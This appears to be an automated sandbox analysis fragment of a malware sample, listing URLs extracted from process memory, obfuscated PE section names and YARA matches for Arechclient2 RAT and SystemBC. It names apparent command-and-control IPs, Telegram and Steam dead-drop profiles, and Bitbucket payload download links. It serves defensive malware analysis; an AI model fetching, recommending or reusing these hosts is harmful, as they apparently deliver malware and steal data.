Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://167.235.150.8:80 |
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://65.21.119.56:80 |
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://65.21.119.56:80/update.zip |
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963 |
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://65.21.119.56:80https://t.me/vmt001hello0;open_open |
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cjDliFVN3QKbi0ymi0MA.WclWOx4jCqZsNQbjvsAivMLJa9uT5DhrasATByTHQ5iENK14UsJkLrDsnRarngdZ7r0MiULb |
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/ |
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/)a |
Source: powershell.exe, 00000020.00000002.716445080.000001A0AC6A4000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t |
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# |
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ripple-wells-2022.net/ |
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000020.00000002.656197895.000001A094341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331524675.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html. |
Source: avicapn32.exe, 0000001B.00000002.857905860.00000000017DE000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://www.zlib.net/D |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com |
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ |
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/E |
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/H |
Source: umciavi64.exe, 00000031.00000003.561824002.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/down. |
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b803c041-f8b5- |
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b97f81fe-0ba4- |
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/cba79466-746d- |
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/l |
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/ |
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/D |
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597 |
Source: umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.631988058.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.642766425.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.bin |
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.binIua2gnOxsYQNjWglYDZ3357MMJTmqF |
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin |
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin6 |
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin8 |
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binR |
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binin |
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binl |
Source: umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin0c9c7142b75e/library.bin |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin8 |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bind |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.binn |
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bint |
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/versal |
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/ww |
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://d301sr5gafysq2.cloudfront.net; |
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000020.00000003.420288387.000001A095FA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000020.00000002.719705380.000001A0AC974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5 |
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe | String found in binary or memory: https://sectigo.com/CPS0 |
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199441933804 |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6315198?product= |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome?p=update_error |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/installer/?product= |
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/dishasta |
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/dishastahttps://steamcommunity.com/profiles/76561199441933804http://167.235.150.8:80dis |
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://t.me/vmt001 |
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website |
Source: DQxttu2Qrr.exe, 00000000.00000002.328859576.0000000027DCD000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/ |
Source: DQxttu2Qrr.exe, 00000000.00000003.264721352.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows |
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: @]topACL |
Source: nppshell[1].exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: nppshell[1].exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: nppshell[1].exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: nppshell[1].exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: nppshell[1].exe.0.dr | Static PE information: section name: @]topACL |
Source: gntuud.exe.4.dr | Static PE information: section name: lB@dO\ih |
Source: gntuud.exe.4.dr | Static PE information: section name: Fh?jG[OJ |
Source: gntuud.exe.4.dr | Static PE information: section name: qNR5:WbS |
Source: gntuud.exe.4.dr | Static PE information: section name: z?fd8ijJ |
Source: gntuud.exe.4.dr | Static PE information: section name: CV?7x>JO |
Source: gntuud.exe.4.dr | Static PE information: section name: dT<:EHzj |
Source: gntuud.exe.4.dr | Static PE information: section name: @]topACL |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: syncfiles.dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles.dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles.dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles.dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles.dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles.dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles.dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: cred64[1].dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64[1].dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64[1].dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64[1].dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64[1].dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64[1].dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64[1].dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64[1].dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64[1].dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: cred64.dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64.dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64.dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64.dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64.dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64.dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64.dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64.dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64.dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64[1].exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64[1].exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64[1].exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64[1].exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64[1].exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64[1].exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: Emit64.exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64.exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64.exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64.exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64.exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64.exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64.exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64.exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64.exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64.exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64.exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64.exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64.exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 87*qGv;7 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: ^NsFAbb[ |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 4.ps1S[" |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: l^D/X#s1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: aAyXB94] |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 7u=]29J1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: *<5LK<h` |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: Ug$Va';z |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: dA:<*dF( |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: r,Ht]nHV |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: m$m2M1,9 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: o?%]P5Wl |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: lNMkoK?T |
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16 |
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT |
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16 |
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT |
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16 |
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT |
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105 |
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC |
Source: 0000002C.00000002.809371970.0000000010005000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105 |
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16 |
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT |
Source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR | Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105 |
